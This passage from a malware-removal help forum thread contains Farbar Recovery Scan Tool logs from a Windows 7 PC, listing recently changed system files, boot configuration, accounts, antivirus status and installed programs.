2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:31 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:24 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2016-12-20 23:30 - 2016-10-11 07:24 - 03944680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2016-12-20 23:30 - 2016-10-11 07:21 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00069120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\nlsbres.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:18 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 07:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2016-12-20 23:30 - 2016-10-11 07:03 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2016-12-20 23:30 - 2016-10-11 07:03 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2016-12-20 23:30 - 2016-10-11 06:59 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2016-12-20 23:30 - 2016-10-11 06:59 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2016-12-20 23:30 - 2016-10-11 06:55 - 00346112 _____ (Microsoft Corporation) C:\Windows\system32\bcdedit.exe
2016-12-20 23:30 - 2016-10-11 06:55 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2016-12-20 23:30 - 2016-10-11 06:51 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2016-12-20 23:30 - 2016-10-11 06:51 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2016-12-20 23:30 - 2016-10-11 06:50 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 06:50 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2016-12-20 23:30 - 2016-10-11 05:18 - 00419648 _____ C:\Windows\SysWOW64\locale.nls
2016-12-20 23:30 - 2016-10-11 05:17 - 00419648 _____ C:\Windows\system32\locale.nls
2016-12-20 23:30 - 2016-10-08 05:06 - 00633296 _____ (Microsoft Corporation) C:\Windows\system32\winload.exe
2016-12-20 23:30 - 2016-10-04 07:31 - 01483264 _____ (Microsoft Corporation) C:\Windows\system32\crypt32.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00229376 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00190976 _____ (Microsoft Corporation) C:\Windows\system32\cryptsvc.dll
2016-12-20 23:30 - 2016-10-04 07:31 - 00141824 _____ (Microsoft Corporation) C:\Windows\system32\cryptnet.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 01176064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\crypt32.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00179200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptsvc.dll
2016-12-20 23:30 - 2016-10-04 07:13 - 00106496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptnet.dll
2016-12-20 16:27 - 2016-12-20 16:27 - 00098642 _____ C:\Users\Owner\Desktop\skyrim iron helm crochet helmet.jpg
2016-12-18 19:25 - 2017-01-05 18:59 - 00000000 __SHD C:\Config.Msi
2016-12-15 08:51 - 2016-12-15 08:51 - 00000000 ____D C:\Users\Owner\AppData\Local\Chromium
2016-12-12 07:32 - 2016-12-12 07:32 - 00076568 _____ (BullGuard Ltd.) C:\Windows\system32\BGLsp.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00170168 _____ (BullGuard Ltd.) C:\Windows\system32\BgGamingMonitor.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00149032 _____ (BullGuard Ltd.) C:\Windows\SysWOW64\BgGamingMonitor.dll
2016-12-12 07:31 - 2016-12-12 07:31 - 00061720 _____ (BullGuard Ltd.) C:\Windows\SysWOW64\BGLsp.dll
 
==================== One Month Modified files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-01-10 15:54 - 2015-12-22 21:54 - 00000908 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineUA.job
2017-01-10 15:28 - 2015-12-22 21:36 - 00000830 _____ C:\Windows\Tasks\Adobe Flash Player Updater.job
2017-01-10 13:48 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\inf
2017-01-10 03:09 - 2009-07-13 20:45 - 00021312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2017-01-10 03:09 - 2009-07-13 20:45 - 00021312 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2017-01-10 02:10 - 2016-11-16 11:34 - 00000000 ____D C:\Users\Owner\AppData\LocalLow\Mozilla
2017-01-10 02:00 - 2016-02-01 15:35 - 00000000 ____D C:\Users\Owner\AppData\Local\Adobe
2017-01-10 01:01 - 2016-02-01 16:43 - 00000000 ____D C:\Users\Owner\AppData\Local\Google
2017-01-10 00:59 - 2016-12-05 22:12 - 00000000 ____D C:\Users\Owner\Desktop\crochet and such
2017-01-10 00:50 - 2016-01-29 17:27 - 00000000 ____D C:\ProgramData\softthinks
2017-01-10 00:49 - 2015-12-22 21:49 - 00000000 ____D C:\Program Files (x86)\Dell Backup and Recovery
2017-01-10 00:48 - 2016-02-12 08:41 - 00000000 ____D C:\Users\Owner\AppData\Local\CrashDumps
2017-01-10 00:48 - 2011-02-10 06:25 - 00000000 ____D C:\Windows\panther
2017-01-10 00:46 - 2009-07-13 21:13 - 00783606 _____ C:\Windows\system32\PerfStringBackup.INI
2017-01-10 00:43 - 2016-08-04 13:37 - 00000000 ___RD C:\Users\Owner\Dropbox
2017-01-10 00:42 - 2015-12-22 21:54 - 00000904 _____ C:\Windows\Tasks\DropboxUpdateTaskMachineCore.job
2017-01-10 00:42 - 2015-12-22 21:46 - 00000000 ____D C:\ProgramData\NVIDIA
2017-01-10 00:42 - 2009-07-13 21:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2017-01-09 22:56 - 2016-02-04 13:37 - 00000000 ____D C:\Users\Owner\AppData\Local\Battle.net
2017-01-09 13:38 - 2016-02-11 18:42 - 00855530 _____ C:\Windows\ntbtlog.txt
2017-01-09 00:45 - 2015-12-22 21:50 - 00000000 ____D C:\Program Files\Common Files\AV
2017-01-09 00:43 - 2009-07-13 19:20 - 00000000 ___HD C:\Windows\system32\GroupPolicy
2017-01-09 00:43 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\SysWOW64\GroupPolicy
2017-01-08 18:37 - 2016-10-02 00:54 - 00000000 ____D C:\Users\Owner\AppData\Local\c345b
2017-01-08 16:11 - 2015-12-22 21:36 - 00802904 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2017-01-08 16:11 - 2015-12-22 21:36 - 00144472 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2017-01-08 16:11 - 2015-12-22 21:36 - 00003768 _____ C:\Windows\System32\Tasks\Adobe Flash Player Updater
2017-01-08 16:11 - 2015-12-22 21:36 - 00000000 ____D C:\Windows\SysWOW64\Macromed
2017-01-08 16:11 - 2015-12-22 21:36 - 00000000 ____D C:\Windows\system32\Macromed
2017-01-08 13:30 - 2016-02-11 15:21 - 00000000 ____D C:\Users\Owner\AppData\Local\ElevatedDiagnostics
2017-01-08 11:09 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\ModemLogs
2017-01-04 20:25 - 2016-01-29 17:22 - 00000000 ____D C:\Users\Owner\AppData\Roaming\Adobe
2017-01-04 19:40 - 2016-09-02 13:50 - 00000000 ____D C:\Users\Owner\Desktop\Textures and such
2017-01-03 14:57 - 2016-04-30 10:29 - 00000000 ____D C:\Program Files\Common Files\Apple
2017-01-01 18:13 - 2015-12-22 21:48 - 00000000 ____D C:\ProgramData\PCDr
2016-12-21 16:49 - 2015-12-22 21:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2016-12-21 11:59 - 2016-07-19 07:55 - 00000000 ____D C:\Windows\system32\MRT
2016-12-21 04:09 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\rescache
2016-12-21 03:28 - 2009-07-13 19:20 - 00000000 __RSD C:\Windows\assembly
2016-12-21 03:28 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\Microsoft.NET
2016-12-21 03:20 - 2009-07-13 20:45 - 04934400 _____ C:\Windows\system32\FNTCACHE.DAT
2016-12-21 03:20 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\winsxs
2016-12-21 03:19 - 2016-02-02 03:45 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-12-21 03:19 - 2016-02-02 03:45 - 00000000 ____D C:\Windows\system32\appraiser
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\SysWOW64\en-US
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\en-US
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\Boot
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\AppPatch
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Program Files\Internet Explorer
2016-12-21 03:19 - 2009-07-13 19:20 - 00000000 ____D C:\Program Files (x86)\Internet Explorer
2016-12-21 03:02 - 2016-07-19 07:55 - 135632432 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2016-12-21 03:01 - 2011-02-10 06:33 - 00775728 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2016-12-21 03:00 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\system32\catroot2
2016-12-20 14:01 - 2016-10-01 13:17 - 00524288 ___SH C:\Windows\system32\config\components{13db9c22-881c-11e6-ae2e-64006a7c8e43}.TMContainer00000000000000000001.regtrans-ms
2016-12-18 19:25 - 2015-12-22 21:47 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dell
2016-12-18 19:25 - 2015-12-22 21:45 - 00000000 ____D C:\Program Files\Dell
2016-12-16 15:21 - 2016-02-01 16:43 - 00003330 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-12-16 15:21 - 2016-02-01 16:43 - 00003202 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-12-16 15:21 - 2009-07-13 19:20 - 00000000 ___RD C:\Program Files (x86)
2016-12-16 15:21 - 2009-07-13 19:20 - 00000000 ____D C:\Windows\Tasks
2016-12-15 09:21 - 2016-02-01 17:03 - 00002197 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-12-15 09:21 - 2016-02-01 17:03 - 00002185 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2016-12-15 08:51 - 2016-02-01 15:30 - 00000000 ____D C:\Users\Owner\AppData\Local\Steam
2016-12-15 08:48 - 2016-11-16 01:30 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-15 08:48 - 2016-02-01 19:54 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
 
==================== Files in the root of some directories =======
 
2016-05-05 04:39 - 2016-09-13 18:59 - 0000033 _____ () C:\Users\Owner\AppData\Roaming\AdobeWLCMCache.dat
2016-06-23 13:01 - 2015-09-25 01:21 - 0016800 _____ () C:\Users\Owner\AppData\Local\Z@!-3b495312-f55f-45c0-9281-2cc59bf18a1b.tmp
2016-06-23 13:01 - 2015-09-25 01:21 - 0015776 _____ () C:\Users\Owner\AppData\Local\Z@S!-c8699736-af5a-499d-bcba-33543711ac5a.tmp
2015-12-22 21:39 - 2015-12-22 21:39 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
 
==================== Bamital & volsnap ======================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
==================== BCD ================================
 
Windows Boot Manager
--------------------
identifier              {bootmgr}
device                  partition=\Device\HarddiskVolume3
description             Windows Boot Manager
locale                  en-us
inherit                 {globalsettings}
default                 {current}
resumeobject            {2661b79b-a945-11e5-904b-64006a7c8e43}
displayorder            {current}
toolsdisplayorder       {memdiag}
timeout                 30
 
Windows Boot Loader
-------------------
identifier              {current}
device                  partition=C:
path                    \Windows\system32\winload.exe
description             Windows 7
locale                  en-us
inherit                 {bootloadersettings}
recoverysequence        {2661b79d-a945-11e5-904b-64006a7c8e43}
recoveryenabled         Yes
osdevice                partition=C:
systemroot              \Windows
resumeobject            {2661b79b-a945-11e5-904b-64006a7c8e43}
nx                      OptIn
bootstatuspolicy        DisplayAllFailures
 
Windows Boot Loader
-------------------
identifier              {2661b79d-a945-11e5-904b-64006a7c8e43}
device                  ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{2661b79e-a945-11e5-904b-64006a7c8e43}
path                    \windows\system32\winload.exe
description             Windows Recovery Environment
inherit                 {bootloadersettings}
osdevice                ramdisk=[\Device\HarddiskVolume3]\Recovery\WindowsRE\Winre.wim,{2661b79e-a945-11e5-904b-64006a7c8e43}
systemroot              \windows
nx                      OptIn
winpe                   Yes
 
Resume from Hibernate
---------------------
identifier              {2661b79b-a945-11e5-904b-64006a7c8e43}
device                  partition=C:
path                    \Windows\system32\winresume.exe
description             Windows Resume Application
locale                  en-US
inherit                 {resumeloadersettings}
filedevice              partition=C:
filepath                \hiberfil.sys
debugoptionenabled      No
 
Windows Memory Tester
---------------------
identifier              {memdiag}
device                  partition=\Device\HarddiskVolume3
path                    \boot\memtest.exe
description             Windows Memory Diagnostic
locale                  en-US
inherit                 {globalsettings}
badmemoryaccess         Yes
 
EMS Settings
------------
identifier              {emssettings}
bootems                 Yes
 
Debugger Settings
-----------------
identifier              {dbgsettings}
debugtype               Serial
debugport               1
baudrate                115200
 
RAM Defects
-----------
identifier              {badmemory}
 
Global Settings
---------------
identifier              {globalsettings}
inherit                 {dbgsettings}
                        {emssettings}
                        {badmemory}
 
Boot Loader Settings
--------------------
identifier              {bootloadersettings}
inherit                 {globalsettings}
                        {hypervisorsettings}
 
Hypervisor Settings
-------------------
identifier              {hypervisorsettings}
hypervisordebugtype     Serial
hypervisordebugport     1
hypervisorbaudrate      115200
 
Resume Loader Settings
----------------------
identifier              {resumeloadersettings}
inherit                 {globalsettings}
 
Device options
--------------
identifier              {2661b79e-a945-11e5-904b-64006a7c8e43}
description             Ramdisk Options
ramdisksdidevice        partition=\Device\HarddiskVolume3
ramdisksdipath          \Recovery\WindowsRE\boot.sdi
 
 
LastRegBack: 2017-01-03 00:04
 
==================== End of FRST.txt ============================


#13 RedArach

Posted 10 January 2017 - 07:14 PM

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-01-2017
Ran by Owner (10-01-2017 16:08:50)
Running from C:\Users\Owner\Downloads
Windows 7 Professional Service Pack 1 (X64) (2016-01-30 01:19:55)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1863785947-2063213224-1850305329-500 - Administrator - Disabled)
Guest (S-1-5-21-1863785947-2063213224-1850305329-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1863785947-2063213224-1850305329-1002 - Limited - Enabled)
Owner (S-1-5-21-1863785947-2063213224-1850305329-1000 - Administrator - Enabled) => C:\Users\Owner
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: BullGuard Antivirus (Enabled - Up to date) {EDBB5818-2352-E06B-028A-4E6873B92CC5}
AV: Avast Antivirus (Enabled - Up to date) {17AD7D40-BA12-9C46-7131-94903A54AD8B}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: BullGuard Antispyware (Enabled - Up to date) {56DAB9FC-0568-EFE5-383A-751A083E6678}
AS: Avast Antivirus (Enabled - Up to date) {ACCC9CA4-9C28-93C8-4B81-AFE241D3E736}
FW: BullGuard Firewall (Enabled) {D580D93D-693D-E133-29D5-E75D8D6A6BBE}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
Adobe After Effects CC 2014 (HKLM-x32\...\{2B22C750-5C3B-4738-B621-BA786AC7A494}) (Version: 13.2.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Flash Player 24 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.186 - Adobe Systems Incorporated)
Adobe Fuse CC (Preview) (HKLM-x32\...\{06F1F289-ACFE-43A2-A654-7950079D6685}) (Version: 1.0 - Adobe Systems Incorporated)
Adobe Illustrator CC 2015.3 (HKLM-x32\...\ILST_20_1_0) (Version: 20.1.0 - Adobe Systems Incorporated)
Adobe Lightroom (HKLM-x32\...\{8048A5DF-8A70-5BE1-954B-E0FDE1BD0D0D}) (Version: 6.7 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_4_0) (Version: 10.4.0 - Adobe Systems Incorporated)
Adobe Photoshop CC 2015.5 (HKLM-x32\...\PHSP_17_0_1) (Version: 17.0.1 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.17)  MUI (HKLM-x32\...\{AC76BA86-7AD7-FFFF-7B44-AB0000000001}) (Version: 11.0.17 - Adobe Systems Incorporated)
Alcor Micro USB Card Reader Driver  (HKLM-x32\...\InstallShield_{E9D8E2D2-4928-437D-ADC6-2EFA7B678FC3}) (Version: 18.5.1844.33907 - Alcor Micro Corp.)
Alcor Micro USB Card Reader Driver  (x32 Version: 18.5.1844.33907 - Alcor Micro Corp.) Hidden
Ansel (Version: 368.81 - NVIDIA Corporation) Hidden
Apple Application Support (32-bit) (HKLM-x32\...\{D079CAAD-0C31-47A2-9AF5-A82F9CD9B221}) (Version: 5.2 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{64E6007B-1DA9-42CD-BBE4-D5FA67A7C71D}) (Version: 5.2 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
Avast Free Antivirus (HKLM-x32\...\Avast) (Version: 12.3.2280 - AVAST Software)
Blender (HKLM\...\{47A0EA10-D506-4473-AE99-5E07DD1062DE}) (Version: 2.77.1 - Blender Foundation)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
Borderlands 2 (HKLM\...\Steam App 49520) (Version:  - Gearbox Software)
BullGuard Premium Protection (HKLM\...\BullGuard) (Version: 16.0 - BullGuard Ltd.)
CameraHelperMsi (x32 Version: 13.51.815.0 - Logitech) Hidden
Cisco EAP-FAST Module (x32 Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (x32 Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (x32 Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Dead by Daylight: BETA (HKLM\...\Steam App 471230) (Version:  - )
Dell Backup and Recovery (HKLM-x32\...\{0ED7EE95-6A97-47AA-AD73-152C08A15B04}) (Version: 1.8.0.66 - Dell Inc.)
Dell Data Vault (Version: 4.3.9.0 - Dell Inc.) Hidden
Dell Digital Delivery (HKLM-x32\...\{693A23FB-F28B-4F7A-A720-4C1263F97F43}) (Version: 3.1.1002.0 - Dell Products, LP)
Dell Edoc Viewer (HKLM\...\{8EBA8727-ADC2-477B-9D9A-1A1836BE4E05}) (Version: 1.0.0 - Dell Inc)
Dell Foundation Services (HKLM\...\{BDB50421-E961-42F3-B803-6DAC6F127834}) (Version: 3.4.15000.0 - Dell Inc.)
Dell SupportAssist (HKLM\...\PC-Doctor for Windows) (Version: 1.3.6855.61 - Dell)
Dell SupportAssistAgent (HKLM-x32\...\{27130E51-9555-408B-8134-7BFF54EDE27B}) (Version: 1.3.0.72 - Dell)
Dell System Detect (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\58d94f3ce2c27db0) (Version: 6.12.0.5 - Dell)
Dell Update (HKLM-x32\...\{DB82968B-57A4-4397-81A5-ECAB21B5DFCD}) (Version: 1.7.1015.0 - Dell Inc.)
Dino D-Day (HKLM-x32\...\Steam App 70000) (Version:  - 800 North and Digital Ranch)
Discord (HKU\S-1-5-21-1863785947-2063213224-1850305329-1000\...\Discord) (Version: 0.0.296 - Hammer & Chisel, Inc.)
Dropbox (HKLM-x32\...\Dropbox) (Version: 16.4.30 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
DW WLAN Card Utility (HKLM\...\DW WLAN Card Utility) (Version: 6.30.223.262 - Dell Inc.)
erLT (x32 Version: 1.20.138.34 - Logitech, Inc.) Hidden
ERUNT 1.1j (HKLM-x32\...\ERUNT_is1) (Version:  - Lars Hederer)
FINAL FANTASY XIV - A Realm Reborn (HKLM-x32\...\{2B41E132-07DF-4925-A3D3-F2D1765CCDFE}) (Version: 1.0.0000 - SQUARE ENIX CO., LTD.)
Goat Simulator (HKLM-x32\...\Steam App 265930) (Version:  - Coffee Stain Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 55.0.2883.87 - Google Inc.)
Google Toolbar for Internet Explorer (HKLM-x32\...\{2318C2B1-4965-11d4-9B18-009027A5CD4F}) (Version: 7.5.8231.2252 - Google Inc.)
Google Toolbar for Internet Explorer (x32 Version: 1.0.0 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.21.169 - Google Inc.) Hidden
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
GoToAssist Corporate (HKLM-x32\...\GoToAssist) (Version: 11.5.0.1165 - Citrix Systems, Inc.)
